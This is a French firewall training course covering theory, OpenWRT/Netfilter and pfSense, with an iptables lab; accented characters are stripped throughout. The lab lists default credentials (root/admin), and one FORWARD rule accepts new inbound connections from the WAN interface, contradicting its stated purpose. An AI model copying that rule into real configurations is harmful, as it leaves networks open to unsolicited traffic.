Pare-Feu Théorie Et Pratique

goffinet@goffinet.
eu, Pare-feu thorie et pratique, CC-BY

Les pare-feu thorie et
pratique
Introduction, Linux Netfilter, BSD pfSense,
Cisco IOS
version 2014.04
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Sommaire gnral
I. Thorie
1. Avant-propos
2. Dfinition
3. Fonctionnement
4. Classification
5. March
6. Pare-feu Open Source
II. Pratique Netfilter
7. Topologie Netfilter
8. Netfilter/iptables
9. Examen avanc du pare-feu
Netfilter
10. Audit du pare-feu
III. Pratique pfSense
11. Topologie pfSense
12. Observation et configuration du
pare-feu
13. Configuration Proxy Transparent
14. NAT : DMZ ou Reverse Proxy
IV. Pratique Cisco IOS
15. Topologie Cisco
16. ACLs Cisco IOS
17. Cisco ZBF
18. Pare-feu Cisco IPv6
I. Introduction aux pare-
feu
Pare-feu thorie et pratique
Sommaire Introduction aux pare-feu
1. Avant-propos
2. Dfinition
3. Fonctionnement
4. Classification
5. March
1. Introduction
1. Introduction
Objectifs de la formation
Acquis/pr-requis
Architecture de scurit
Modle de conception
Attaques TCP/IP
Ce document est un support de formation thorique et pratique
dinitiation aux pare-feu TCP/IP. Il est destin un public de
professionnels IT ayant dj une bonne connaissance de
TCP/IP.
Le propos prend pour illustration des produits Open Source
virtualiss Linux Netfilter, BSD pf (pfSense) et Cisco IOS. Les
labs proposs peuvent tre raliss chez soi sur son propre PC.
Le support correspond et introduit au programme CCNA Security
(Firewalls).
Ce document vise pdagogique nest en rien un livre de
recette ou un guide. Une prsence et une participation active au
cours est ncessaire pour bien suivre la prsentation.
Acquis/pr-requis
Rappels TCP/IP
Concepts de scurit, attaques, menaces, contre-
mesures
La matrise doutils daudit tels que Wireshark, Nmap et
Netcat.
Une topologie route fonctionnelle en TCP/IP
GNS3/VirtualBox/VMWare.
Des services dploys : Telnet, SSH, NTP, SNMP,
DNS, Syslog, ICMP, IPv6, OSPF, Radius.
802.1X/Radius/802.11i
Tunnel traversant les pare-feu/proxy public
Architecture de scurit
Architectures et mthodes de scurit : par exemple
modules Cisco SAFE.
Modle de conception
Mise en oeuvre des politiques de scurit :
exemple : Cisco.
Attaques TCP/IP
IP Spoofing, TCP/IP scanning, Flooding, DoS, DDoS,
variante TCP/UDP (voir NMAP). Variantes IPv6 (voir
THC-IPv6).
Attaques sur les protocoles de routage intrieurs et
BGP
Attaques dhomme du milieu (MitM), de
reconnaissance, dvasion, attaque en force-brute, trafic
malicieux, phishing, dnis de service (DoS, DDoS), par
rflexion, backdoor, injections Web, via malware ou
worms
http://hakipedia.com/index.php/Hakipedia
2. Dfinition
2. Dfinition
Pare-feu / Firewall
Objectifs dun pare-feu
Ce que le pare-feu ne fait pas
Pare-feu / Firewall
Dans un systme d'information, les politiques de filtrage
et de contrle du trafic sont places sur un matriel ou
un logiciel intermdiaire communment appel pare-
feu (firewall).
Cet lment du rseau a pour fonction dexaminer et
filtrer le trafic qui le traverse.
On peut le considrer comme une fonctionnalit dun
rseau scuris : la fonctionnalit pare-feu
Lide qui prvaut ce type de fonctionnalit est le
contrle des flux du rseau TCP/IP.
Le pare-feu limite le taux de paquets et de connexions
actives. Il reconnat les flux applicatifs.
Objectifs dun pare-feu
Il a pour objectifs de rpondre aux menaces et attaques
suivantes, de manire non-exhaustive :
Usurpation didentit
La manipulation dinformations
Les attaques de dni de service (DoS/DDoS)
Les attaques par code malicieux
La fuite dinformation
Les accs non-autoris (en vue dlvation de privilge)
Les attaques de reconnaissance, dhomme du milieu, l
exploitation de TCP/IP
Ce que le pare-feu ne fait pas
Le pare-feu est central dans une architecture
scurise mais :
Il ne protge pas des menaces internes.
Il napplique pas tout seul les politiques de
scurit et leur surveillance.
Il ntablit pas la connectivit par dfaut.
Le filtrage peut intervenir tous les niveaux
TCP/IP de manire trs fine.
3. Fonctionnement
3. Fonctionnement
Fonctionnement
Zone de confiance sur un pare-feu
Niveau de confiance
Attaques sur le LAN
Filtrage
Politique de filtrage typique
Fonctionnement
Il a pour principale tche de contrler le trafic entre
diffrentes zones de confiance, en filtrant les flux de
donnes qui y transitent.
Gnralement, les zones de confiance incluent lInternet (une zone dont la
confiance est nulle) et au moins un rseau interne (une zone dont la confiance
est plus importante).
Le but est de fournir une connectivit contrle et matrise entre des zones de
diffrents niveaux de confiance, grce l'application de la politique de scurit
et d'un modle de connexion bas sur le principe du moindre privilge.
Un pare-feu fait souvent office de routeur et permet ainsi
d'isoler le rseau en plusieurs zones de scurit appeles
zones dmilitarises ou DMZ. Ces zones sont spares
suivant le niveau de confiance qu'on leur porte.
Organisation du rseau en zones
Niveau de confiance
Le niveau de confiance est la certitude que les utilisateurs
vont respecter les politiques de scurit de lorganisation.
Ces politiques de scurit sont dictes dans un document
crit de manire gnrale. Ces recommandations touchent
tous les lments de scurit de lorganisation et sont
traduites particulirement sur les pare-feu en diffrentes
rgles de filtrage.
On notera que le pare-feu nexamine que le trafic qui le
traverse et ne protge en rien des attaques internes,
notamment sur le LAN.
Attaques sur le LAN
On doit considrer le LAN comme ntant pas exempt de
menaces (dites internes).
Il englobe aussi bien les rseaux filaires (IEEE 802.3) que
sans-fil (IEEE 802.11) dans des architectures
traditionnelles ou ouvertes (BYOD).
Le pare-feu nintervient que partiellement dans la mise en
oeuvre de politiques de scurit au niveau de la couche 2 :
Cisco appelle cet aspect First Hop Security.
Politiques de filtrage
Selon les besoins, on placera les politiques de filtrage
diffrents endroits du rseau, au minimum sur chaque hte
contrl (pare-feu local) et en bordure du rseau
administr sur le pare-feu. Ces emplacements peuvent tre
distribu dans la topologie selon sa complexit.
Pour viter qu'il ne devienne un point unique de rupture, on
s'efforcera d'assurer la redondance des pare-feu. On
placera plusieurs pare-feu dans larchitecture du rseau
des fins de contrle au plus proche dune zone ou pour
rpartir la charge.
Filtrage
La configuration d'un pare-feu consiste la plupart du temps
en un ensemble de rgles qui dterminent une action de
rejet ou d'autorisation du trafic qui passe les interfaces du
pare-feu en fonction de certains critres tels que :
l'origine et la destination du trafic,
des informations d'un protocole de couche 3 (IPv4,
IPv6, ARP, etc.),
des informations d'un protocole de couche 4 (ICMP,
TCP, UDP, ESP, AH, etc.)
et/ou des informations d'un protocole applicatif (HTTP,
SMTP, DNS, etc.).
Dcision de filtrage
Les rgles sont appliques
en fonction de la direction du
trafic entrant ou sortant sur
une interface, avant ou
aprs le processus de
routage des paquets. Cette
dernire ralit diffre selon
le logiciel ou le matriel
choisi pour remplir ces
tches.
Ici lexemple de Netfilter.
Rgles
Chaque rgle est examine selon son ordonnancement.
Si le trafic ne correspond pas la premire rgle, la seconde rgle
est value et ainsi de suite.
Lorsqu'il y a correspondance entre les critres de la rgle et le
trafic, l'action dfinie est excute et les rgles suivantes ne sont
pas examines.
La terminologie des actions usuelles peuvent tre accept, permit,
deny, block, reject, drop, ou similaires.
En gnral, un ensemble de rgles se termine par le refus de tout
trafic, soit en dernier recours le refus du trafic qui traverse le pare-
feu. Ce comportement habituellement dfini par dfaut ou de
manire implicite refuse tout trafic pour lequel il n'y avait pas de
correspondance dans les rgles prcdentes.
Politique de filtrage typique
On peut rsumer des
politiques de filtrage typique.
LAN > WAN
WAN X LAN
LAN > DMZ
DMZ X LAN
WAN X DMZ (sauf
TCP80 par exemple)
DMZ > WAN
Topologie dtude
4. Classification
4. Classification
Filtrage sans tat
Pare-feu tat
Pare-feu applicatif
Serveur Proxy
Fonctionnalits supplmentaires
Reverse-Proxy
Classification
On distinguera les fonctionnalits gnrationnelles :
pare-feu sans tat,
pare-feu avec tat, filtrant les sessions TCP
entrantes et sortantes.
et pare-feu applicatif.
Dans une autre typologie fonde sur l'emplacement des
fonctionnalits, on distinguera les
pare-feu locaux des
pare-feu ddis, logiciels ou matriels.
On remarquera utilement que Windows dispose d'un pare-
feu local intgr.
Filtrage sans tat
Le filtrage sans tat correspond lusage des
ACLs Cisco.
Ces rgles de filtrage ne tiennent pas compte
de ltat des session TCP/UDP/ICMP ou de la
conformit applicative.
Leur apprentissage consiste en un bon
dmarrage en la matire.
http://fr.scribd.com/doc/206817949/ICND1-0x0B-ACLs-et-
diagnostic
Pare-feu tat
En informatique, un pare-feu tats (stateful firewall,
stateful inspection firewall ou stateful packet inspection
firewall en anglais) est un pare-feu qui garde en mmoire
l'tat de connexions rseau (comme les flux TCP, les
communications UDP) qui le traversent.
Le fait de garder en souvenir les tats de connexions prcdents permet de
mieux dtecter et carter les intrusions et assurer une meilleure scurit. Le
pare-feu est programm pour distinguer les paquets lgitimes pour diffrents
types de connexions. Seuls les paquets qui correspondent une connexion
active connue seront autoriss par le pare-feu, d'autres seront rejets.
Linspection dtat (stateful inspection), appele aussi le filtrage dynamique (
Dynamic Packet Filtering) est une fonctionnalit de scurit qui est souvent
implmente dans des rseaux d'entreprises. Cette fonctionnalit a t
invente par Check Point Software, qui la lance avec leur logiciel FireWall-1
en 1994.
http://fr.wikipedia.org/wiki/Pare-feu_%C3%A0_%C3%A9tats
Pare-feu applicatif
Un pare-feu applicatif vrifie la conformit du paquet par
rapport un protocole applicatif attendu.
Par exemple, ce type de pare-feu permet de vrifier que seul du trafic HTTP
passe par le port TCP 80. Ce traitement est trs gourmand en temps de calcul
ds que le dbit devient trs important. Il est justifi par le fait que de plus en
plus de protocoles rseaux utilisent un tunnel TCP afin de contourner le filtrage
par ports.
Une autre raison de l'inspection applicative est l'ouverture dynamique de ports.
Certains protocoles comme le fameux FTP en mode passif changent entre le
client et le serveur des adresses IP ou des ports TCP/UDP. Ces protocoles
sont dits contenu sale ou passant difficilement les pare-feu car ils
changent au niveau applicatif (FTP) des informations du niveau IP (change
d'adresses) ou du niveau TCP (change de ports). Ce qui transgresse le
principe de la sparation des couches rseaux. Pour cette raison, les
protocoles contenu sale passent difficilement voire pas du tout les rgles
de NAT ...dynamiques, moins qu'une inspection applicative ne soit faite sur
ce protocole.
Solution pare-feu applicatif
Chaque type de pare-feu sait inspecter un nombre limit d'applications.
Chaque application est gre par un module diffrent pour pouvoir les activer
ou les dsactiver.
La terminologie pour le concept de module est diffrente pour chaque type de
pare-feu : par exemple : Le protocole HTTP permet d'accder en lecture sur un
serveur par une commande GET, et en criture par une commande PUT. Un
pare-feu applicatif va tre en mesure d'analyser une connexion HTTP et de
n'autoriser les commandes PUT qu' un nombre restreint de machines.
Conntrack (suivi de connexion) et l7 Filter (filtrage applicatif) sur Linux
Netfilter
Packet Filter ou PF, pare-feu libre de OpenBSD, import depuis sur les
autres BSD.
CBAC sur Cisco IOS, Fixup puis inspect sur Cisco PIX
Predefined Services sur Juniper ScreenOS
Stateful Inspection sur Check Point FireWall-1
Serveur Proxy
La fonctionnalit serveur Proxy (mandataire) consiste lui
confier du trafic qui le traverse, avec le support dHTTP,
HTTPS, FTP, voire tout protocole TCP/UDP.
Cette fonctionnalit rompt la connectivit TCP/IP mais
permet un contrle fin du trafic des utilisateurs.
A des fins de performance : cache, compression, de filtrage de publicit ou
de contenus lourds
A des fins de journalisation
En supportant AAA pour contrler le trafic des utilisateurs internes
(authentification, autorisation, comptabilisation)
En assurant la confidentialit des communications (chiffrement)
En filtrant sur base des URLs, voire du contenu
En reprenant des fonctionnalits de pare-feu
Architecture serveur Proxy
Un serveur proxy est un logiciel local ( des fins de mise en
tunnel), excut sur un serveur distant ou sur le pare-feu
lui-mme.
Il peut ncessiter une intervention sur les machines clientes
ou tre totalement transparent.
Un serveur proxy remplace les paramtres TCP/IP de l
metteur et le rend plus transparent sur le rseau. Dune
certaine manire il peut renforcer lanonymat.
Un Forwarding proxy prend en charge les
requtes venant dun rseau interne et les
transfre vers lInternet.
Un proxy ouvert prend en charge les
requtes venant de nimporte quel rseau
et les transfre vers lInternet.
Fonctionnalits supplmentaires
Dans le mme ordre d'ides, compte tenu de son
emplacement critique, il hbergera des fonctions :
de concentrateur VPN,
de rpartiteur de charge du trafic,
de traffic shapping et de contrle de congestion (WAN)
le support des encapsulations VLAN,
des protections contre les virus, logiciels et messages
TCP/IP malveillants,
de la dtection et/ou de la prvention de d'intrusion
(IDS/IPS),
bien que ntant pas dans ses attributions le support
des protocoles de routage,
etc.
Dernires recommandations
En soi, le pare-feu ne protge le rseau que de manire
incomplte. On compltera l'infrastructure scurise par
des solutions de surveillance du rseau.
Une infrastructure de gestion des anti-virus et pare-feu
locaux ainsi que des mises jours des systmes
d'exploitation et des logiciels installes est aussi
conseille.
Enfin, il ny a pas de scurit du rseau sil nexiste pas
de document qui dcrit les politiques de scurit de l
organisation.
Reverse-Proxy
Un Reverse proxy apparat comme tant le
serveur destinataire final. Il prend en charge les
requtes venant de lInternet et les transfre
un rseau interne.
En ce sens un Reverse-Proxy peut cacher les
caractristiques du serveur qui est demand. Il
peut prendre en charge des fonctionnalits de
filtrage de haut-niveau applicatif.
Fonctionnalits Reverse-Proxy
WAF : Fonctionnalits Applications Firewall
contre des attaques Web et les Worms
SSL Acceleration : Prise en charge du
chiffrement SSL la place du fournisseur de
contenu
Load Balancing : Rpartiteur de trafic (Web)
Mise en cache et/ou compression de
contenu statique ou dynamique, Web
Acceleration
Rcriture dURL, migration de sites WEB
Pour aller plus loin sur les proxys
3 Implementations of
proxies
3.1 Web proxy servers
3.2 SOCKS proxy
3.3 Transparent proxy
3.3.1 Purpose
3.3.2 Issues
3.3.3 Implementation
methods
3.3.4 Detection
3.4 CGI proxy
3.5 Anonymous HTTPS
proxy
3.6 Suffix proxy
3.7 Tor onion proxy
software
3.8 I2P anonymous
proxy
3.9 Proxy vs. NAT
3.10 DNS proxy
5. March
5. March
Format
Cibles
Appliances
Firewall Enterprise
Firewall UTM
Web Gateway Filtering
Format
On trouvera des pare-feu en format :
1. Appliance hardware, ddi (commercial en
gnral).
2. En Software, commercial ou Open-Source
installer sur son propre Hardware, en
virtualisation (DC ou lab)
3. En produits spcialiss ou fonctionnels.
Offre et cibles
Logiciels Open source
Offres commerciales
Segments/cibles :
CPE/Soho Firewalls
UTM : SMB Firewalls
Enterprise Firewalls
Offres spcialises
Appliances
Matriel physique dinterconnexion.
Minimum des interfaces Gigabit Ethernet
Cuivre et +
Filtrage de Haut niveau et services intgrs
Architectures Intel : puissance, portabilit
Architectures ARM : faible consommation,
portabilit
Virtualisation
Solutions pare-feu pour Data Center (DC) :
Cisco CSR1000V
Cisco Adaptive Security Virtual Appliance (ASAv)
Vyatta.org et Vyatta.com (Brocade)
pfSense
...
Firewall Entreprise
The enterprise network firewall market represented by this Magic Quadrant is
composed primarily of purpose-built appliances and virtualized models for
securing corporate networks. Products must be able to support single-
enterprise firewall deployments and large global deployments, including
branch offices. These products are accompanied by highly scalable
management and reporting consoles, products, and a sales and support
ecosystem focused on the enterprise.
Although firewall/VPN and IPS are converging, other security products are
not. All-in-one or unified threat management (UTM) products are suitable for
small or midsize businesses (SMBs) but not for the enterprise: Gartner
forecasts that this separation will continue until at least 2016. Branch-office
firewalls are becoming specialized products, diverging from the SMB
products
Firewall Entreprise
Unified Threat Management (UTM)
Gartner defines the unified threat management (UTM) market as
multifunction network security products used by small or midsize
businesses (SMBs). Typically, midsize businesses have 100 to
1,000 employees, with revenue ranging from $50 million to $1
billion. UTM products for the SMB market must provide the
following functions at a minimum:
Standard network stateful firewall functions
Remote access and site-to-site virtual private network (VPN)
support
Secure Web gateway (SWG) functionality (anti-malware,
URL and application control)
Network intrusion prevention focused on workstation
protection
All UTM products contain various other security capabilities, such as email
security, Web application firewalls (WAFs) and data loss prevention.
However, the vast majority of SMBs only utilize
the firewall,
intrusion prevention
and SWG functionalities.
They also request a basic level of application control, mostly to restrict the
use of Web applications and cloud services (such as socialmedia, file sharing
and so on).
Features related to the management of mobile devices create a potentially
attractive differentiator for this market.
Browser-based management, basic embedded reporting, and localized
software and documentation, which don't appeal to large enterprises, are
highly valued by SMBs in this market.
SMBs should evaluate UTM devices based on the controls
they will actually use, the performance they will get for
those features, and the quality of vendor and channel (and
managed services) support that is available.
Given the continuing economic uncertainty, most SMBs
have strong IT budgetary and staffing constraints. This
causes them to highly value ease of deployment and use,
strong local channel support, and flexible pricing.
Web Gateway Filtering
Netfilter/iptables
OpenWRT
pfSense
Pare-feu Open Source
A embarquer.
Support communautaire large gratuit ou
payant ou commercial.
Solutions tous les niveaux.
Solutions intgres.
Pratique Linux et BSD
1. Etudier le pare-feu Linux Netfilter
2. Dployer une solution UTM OSS : pfSense
Netfilter
OpenWRT
OpenWrt est une distribution GNU/Linux minimaliste pour
matriel embarqu (Routeurs, Tablettes, Tlphones ...).
Historiquement dveloppe pour remplacer le firmware des
routeurs bass sur des SoC Broadcom, par exemple les
routeurs WLAN de Asus, Belkin, Dell, Linksys, US-
Robotics, TP-Link, ... OpenWrt fournit une interface Web
LuCI et une console Linux UCI faciles prendre en
main.
TP-WDR3600/WR841ND sous OpenWRT :
Atheros AR9344@560MHz
128Mb RAM / 8 Mb Flash
SOC + Atheros AR9582 a/b/g/n 2T2R
4 Gbit LAN 1 Gbit WAN
12V 1.5A 2x USB 2.0
Pfsense
pfSense est un routeur / pare-feu open source bas sur
FreeBSD. pfSense peut tre install sur un simple
ordinateur personnel comme sur un serveur. Bas sur PF
(packet filter), comme iptables sur GNU/Linux, il est rput
pour sa fiabilit. Aprs une installation en mode console, il
s'administre ensuite simplement depuis une interface web
et gre nativement les VLAN (802.1q).
Un support commercial est disponible ainsi quune offre d
appliances Hardware ou virtuelles.
Fonctionnalits pfSense
Firewall
State Tabel
Network Address Translation
High Availability
Load Balancing
Virtual Private Network
PPPoE Server
Reporting and Monitoring
Dynamic DNS
Captive Portal
DHCP Server and Relay
https://doc.pfsense.org/index.php/2.
1_New_Features_and_Changes
Serveurs Proxy OSS
Squid
SquidGuard
DansGuardian
LightSquid
Privoxy
II. Pratique Linux Netfilter
Sommaire Pratique Linux Netfilter
7. Topologie Netfilter
9. Examen avanc du pare-feu Netfilter
7. Topologie Linux
Netfilter
7. Topologie Linux Netfilter
Fonctionnalits
NAT/PAT, SNAT/DNAT
Topologie dtude, topologie physique,
topologie logique
Composants personnels, quipes
Paramtres rseau et des VMs
Installation du pare-feu
Fonctionnalits de la topologie
En bordure du rseau, le pare-feu tablit la
connectivit IPv4 avec des fonctions de
routage et de NAT.
Il peut intgrer des fonctionnalits
VPN/IPS/Firewall/proxy intgres ou spares.
On peut ajouter la topologies des moniteurs
IDS/IPS, des appliances NAC, une gestion
intgres des accs, des pare-feu et anti-X
locaux.
NAT/PAT
La fonctionnalit NAT/PAT vise r-crire les en-ttes
de couche 3 et couche 4.
Il rompt la connectivit TCP/IP.
Il est indispensable pour connecter un rseau global
un rseau IPv4 priv.
Il na pour objectif que dassurer des migrations d
adressage IPv4, notamment en rduisant le manque d
adresses IPv4.
Il ne constitue en rien un technique de scurit, de
filtrage ou de contrle. Il rend le rseau IPv4 un peu
plus opaque.
Il est souvent excut ct des processus de filtrage
puisquil sagit de rcriture de paquets.
SNAT/DNAT
Le SNAT vise rcrire les adresses/ports source.
Le DNAT vise rcrire les adresses/ports destination.
On peut jouer sur les numros de ports source et
destination.
Les ports connus :
TCP80 HTTP,
TCP443 HTTPS,
TCP25 SMTP,
UDP53 DNS,
UDP123 NTP,
TCP22 SSH,
TCP21 FTP
...
Configuration de la topologie
Le pare-feu est virtualis (VMWare de prfrence)
Le LAN est aussi virtualis. On y trouve une station
avec un OS graphique : 192.168.1XY.0/24
Le WAN se connecte au rseau local de la machine
physique et obtient ses paramtres IP dynamiquement.
La DMZ est aussi virtualise.
Paramtres par dfaut
La solution pare-feu dmarrera avec un
service DHCP sur le LAN, le routage et le
pare-feu activ par dfaut.
Il se configure grce la station de travail
virtuelle du LAN en SSH, en HTTP ou en
HTTPS.
Son adresse par dfaut est 192.168.1.1
Topologie dtude
Topologie physique
128Mo 1Go
128Mo 1Go
1Go 2Go
Topologie Linux/Netfilter
Composants personnels
Station Windows (ou Linux)
sur un LAN virtuel, station
de contrle du pare-feu en
HTTPS et en SSH
Pare-feu OpenWRT et
Pfsense
Des attaquants potentiels,
les stations hardware du
rseau physique.
Paramtres rseau
Apprenant X
Equipe Y
Lordre de cration des interfaces est
important.
Zone Vmware
Br
Mode Linux Intf Adresse
LAN VMNET1 Host-Only eth0 192.168.1XY.*/24
WAN VMNET0 Bridged eth1 DHCP
DMZ VMNET2 Host-Only eth2 192.168.XY.*/24
Paramtres des VMs
Une VM Windows 7, Kali ou Ubuntu prte
avec Firefox.
Une VM OpenWRT x86 Linux Ubuntu :
HD :vmdk-ext4 (8 Mo)
3 interfaces
128 Mo RAM
Une interface de gestion par dfaut
192.168.1.1/24
Mot de passe Openwrt : root/admin
Procdure dinstallation du pare-feu
OpenWRT :
Crer une VM Linux Ubuntu avec le disque
VMDK attach (RAM 128 Mo) et trois
interfaces.
Dmarrez la VM cre
Etablir la connectivit
1. (Activer le mot de passe) et changer le nom
2. (Changer ladressage)
3. (Configuration des interfaces)
4. Activation du routage et du NAT
5. Service DHCP (client et serveur)
6. Service DNS
7. Service NTP
8. Service de Logs
9. Service daccs distant
10. Services IPv6
Configuration de linterface WAN
NTP
Mot de passe et SSH
Vrification gnrale
Netfilter/iptables
Firewall OpenWRT - LuCI Firewall
Thorie Netfilter/iptables
Mise en oeuvre dun pare-feu Netfilter
Pare-feu OpenWRT
OpenWrt s'appuie sur Netfilter pour le filtrage de paquets,
le NAT/PAT et leur altration (mangle). LuCI Firewall fournit
une interface de configuration qui fait abstraction du
systme iptables. Il fournit un modle de configuration
simplifie qui est propre la plupart des besoins rguliers
tout en permettant l'utilisateur de construire des rgles
iptables particulires. OpenWRT dispose de plusieurs
avantages :
facilement portable
gratuit
dmonstratif
faible emprunte
LuCI Firewall (1/2)
LuCI Firewall relie deux ou plusieurs interfaces ensembles
dans des zones qui sont utilises pour dcrire les rgles
par dfaut pour une interface donne, la transmission des
rgles entre les interfaces, et des rgles supplmentaires
qui ne sont pas couvertes par les deux premiers.
Toute la configuration, assez lisible, se trouve dans
/etc/config/firewall
Le service se manipule de la sorte :
/etc/init.d/firewall [stop|start]
LuCI Firewall (2/2)
Dans le fichier de configuration, les rgles par dfaut
viennent en premier, mais elles sont les dernires
prendre effet. Le systme de Netfilter est un filtre de
traitement enchan o les paquets passent par diverses
rgles.
La premire rgle qui correspond est excute, ce qui conduit souvent une
autre rgle de la chane jusqu' ce qu'un paquet correspond soit ACCEPT ou
DROP ou REJECT. Un tel rsultat est dfinitif, par consquent, les rgles
par dfaut prennent effet dernier, et la rgle la plus spcifique prend effet en
premier.
Les zones sont galement utiliss pour configurer le masquage galement
connu sous le NAT (Network Address Translation) ainsi que les rgles de
redirection de port, qui sont plus gnralement connu sous le nom de
redirections.
Configuration LuCI par zone
Rgles spcifiques
IPTABLES : la thorie
Les rgles de pare-feu sont examines dans l
ordre de leur introduction avec la politique par
dfaut qui termine la liste (la chane).
Chaque rgles est une commande iptables ou
ip6tables.
Ds que la correspondance est trouve, la liste
sarrte.
Trois tables : filter, nat et mangle
iptables et ip6tables sont les logiciels (interface
utilisateur) de filtrage, de traduction dadresses
(NAT/PAT) et de transformation du trafic.
Trois usages, trois tables :
filter
nat
mangle
On ne parlera ici que des tables filter et nat, qui
sont constitues de chanes, sortes dACLs,
elles-mmes constitues de rgles.
Chanes de la table filter
La table filter filtre le
trafic dans trois
situations (chanes) :
INPUT : destination d
une interface du pare-
feu
OUTPUT : sortant dune
interface du pare-feu
FORWARD : traversant
le pare-feu dune
interface une autre
Cibles possibles
loption -j (jump) dfinit une cible (une action) :
ACCEPT : le paquet est accept et pris en
charge par les processus du noyeau
DROP : le paquet est jet, sans plus
REJECT : le paquet est jet, mais un
message derreur est renvoy au
destinataire
LOG : journalisation du trafic. passe la
rgle suivante.
...
une autre chane utilisateur
La table nat
Le NAT/PAT vise rcrire les champs dadresses et
de ports TCP/IP du trafic qui traverse le pare-feu.
Il est principalement utile dans le cadre du manque d
adresses IPv4 globale.
Il peut intervenir avant que le trafic soit rout, en
changeant ladresse et le port de destination (DNAT,
redirection) vers un serveur
Il peut intervenir aprs que le trafic soit rout, en
changeant dadresse et le port source (SNAT,
masquage) pour offrir une connectivit globale un bloc
IP priv
Chanes de la table NAT
PREROUTING :
DNAT : redirection de port dans une DMZ
REDIRECT : redirection (vers un proxy)
POSTROUTING :
SNAT : NAT/PAT statique
MASQUERADE : NAT overload (masquage)
Cibles de la table NAT
Syntaxe
iptables -t [filter, nat]
commandes : -A,
chane : [INPUT, OUTPUT, FORWARD]
critres : -i, -o, -s, -d, -p, -m, .
-j : jump action ou rgles utilisateur :
DROP, REJECT, ACCEPT, LOG, ...
Commandes
-t : dsigne la table [filter, nat]
-F : supprime toutes les chanes prdfinies
-X : supprime toutes les chanes utilisateurs
-A : ajoute une rgle une chane (et une table) suivi de critres et dun jump
-D : supprime une rgle
-I : insre une rgle
-P : Dfinit la politique (ou cible) par dfaut d'une chane. Seules les chanes
prdfinies peuvent avoir un comportement par dfaut. Cette cible ne sera
applique qu'aprs l'excution de la dernire rgle de la chane.
-L -n -v : Liste les rgles
-S : Liste les commandes
-j : jump : action : [DROP, REJECT, ACCEPT, LOG]
Les critres
Les critres peuvent tre multiples :
Interface source ou destination.
Adresse IP source ou de destination.
Port source ou de destination.
Type de trame.
Nombre de paquets.
Paquet marqu par la table Mangle.
Etc.
Les critres de filtrage (1/2)
-p <protocol-type> Protocole ; icmp, tcp, udp, et all
-s <ip-address> Adresse IP source
-d <ip-address> Adresse IP destination
-i <interface-name> nom dinterface dentre : eth0, eth1
-o <interface-name> nom dinterface de sortie : eth0, eth1
-p tcp --sport <port> port TCP source.
-p tcp --dport <port> port TCP destination.
-p tcp --syn Utilis pour identifier une nouvelle requte de connexion. ! --syn signifie pas de
nouvelle de requte de connexion
-p udp --sport <port> port UDP source.
-p udp --dport <port> port UDP destination.
--icmp-type <type> echo-reply, echo-request
-m multiport --sports <port, port>
-m multiport --dports <port, port>
-m multiport --ports <port, port>
Les critres de filtrage (2/2)
-m --state <state>
ESTABLISHED: Le paquet fait partie dune connexion qui a t constate dans les deux
directions.
NEW: Le paquet est le dbut dune nouvelle connexion.
RELATED: Le paquet dmarre une seconde nouvelle connexion
INVALID: Le paquet ne peut pas tre identifi.
Chanes Utilisateurs
Les chanes utilisateurs sont des chanes
spcifiques dfinies par ladministrateur (autres
que les chanes prdfinies PREROUTING,
INPUT, FORWARD, OUTPUT et
POSTROUTING).
Elles sont appeles :
par une ou dautres chanes utilisateurs ou,
par une ou plusieurs chanes prdfinies.
Pratique Iptables
A partir de la station de travail, veuillez vous connecter en
SSH sur le pare-feu Linux :
login as: root
root@192.168.1XY.1's password:
BusyBox v1.19.4 (2013-03-06 20:07:44 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.
_______ ________ __
| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____|
|__| W I R E L E S S F R E E D O M
-----------------------------------------------------
ATTITUDE ADJUSTMENT (12.09, r36088)
-----------------------------------------------------
* 1/4 oz Vodka Pour all ingredients into mixing
* 1/4 oz Gin tin with ice, strain into glass.
* 1/4 oz Amaretto
* 1/4 oz Triple sec
* 1/4 oz Peach schnapps
* 1/4 oz Sour mix
* 1 splash Cranberry juice
-----------------------------------------------------
root@OpenWrt:~#
Pare-feu de base
Rinitialisation des rgles
Hardening du pare-feu : Politique INPUT
Pare-feu applicatif : Politique FORWARD
NAT/PAT overload : Chane NAT
POSTROUTING
Vrification
Rinitialisation des rgles
iptables -F
iptables -X
iptables -L -n -v
Maintient des sessions tablies :
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
Politique INPUT
Refus de tout trafic entrant sur linterface LAN
sauf ladministration HTTP, SSH et DHCP, sauf
le trafic de loopback :
iptables -t filter -A INPUT -p tcp -i br-lan --dport ssh -j ACCEPT
iptables -t filter -A INPUT -p tcp -i br-lan --dport 80 -j ACCEPT
iptables -t filter -A INPUT -p udp -i br-lan --dport 67:68 -j ACCEPT
iptables -t filter -A INPUT -p icmp --icmp-type echo-request -m limit --
limit 100/s -i br-lan -j ACCEPT
iptables -I INPUT 2 -i lo -j ACCEPT
iptables -P INPUT DROP
Comment autoriser du trafic DHCP sur l
interface WAN (eth1) ?
Politique FORWARD
Le trafic initi derrire le pare-feu est autoris
le traverser avec un suivi des connexions :
iptables -A FORWARD -o eth1 -m state --state
NEW,RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i eth1 -m state --state
NEW,RELATED,ESTABLISHED -j ACCEPT
Chaine NAT POSTROUTING
Activation du NAT :
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
root@OpenWrt:~# iptables -t nat -L -n -v
Vrification
Chain INPUT (policy DROP 77 packets, 6323 bytes)
pkts bytes target prot opt in out source destination
1425 143K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0
ctstate ESTABLISHED
0 0 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT tcp -- br-lan * 0.0.0.0/0 0.0.0.0/0
tcp dpt:22
127 6604 ACCEPT tcp -- br-lan * 0.0.0.0/0 0.0.0.0/0
tcp dpt:80
0 0 ACCEPT udp -- br-lan * 0.0.0.0/0 0.0.0.0/0
udp dpts:67:68
1 60 ACCEPT icmp -- br-lan * 0.0.0.0/0 0.0.0.0/0
icmp type 8 limit: avg 100/sec burst 5
Chain FORWARD (policy DROP 0 packets, 0 bytes)
47 2740 ACCEPT all -- * eth1 0.0.0.0/0 0.0.0.0/0
state NEW,RELATED,ESTABLISHED
47 2814 ACCEPT all -- eth1 * 0.0.0.0/0 0.0.0.0/0
state NEW,RELATED,ESTABLISHED
Chain OUTPUT (policy ACCEPT 1329 packets, 440K bytes)
Questions
Comment sauvegarder/restaurer ses rgles
?
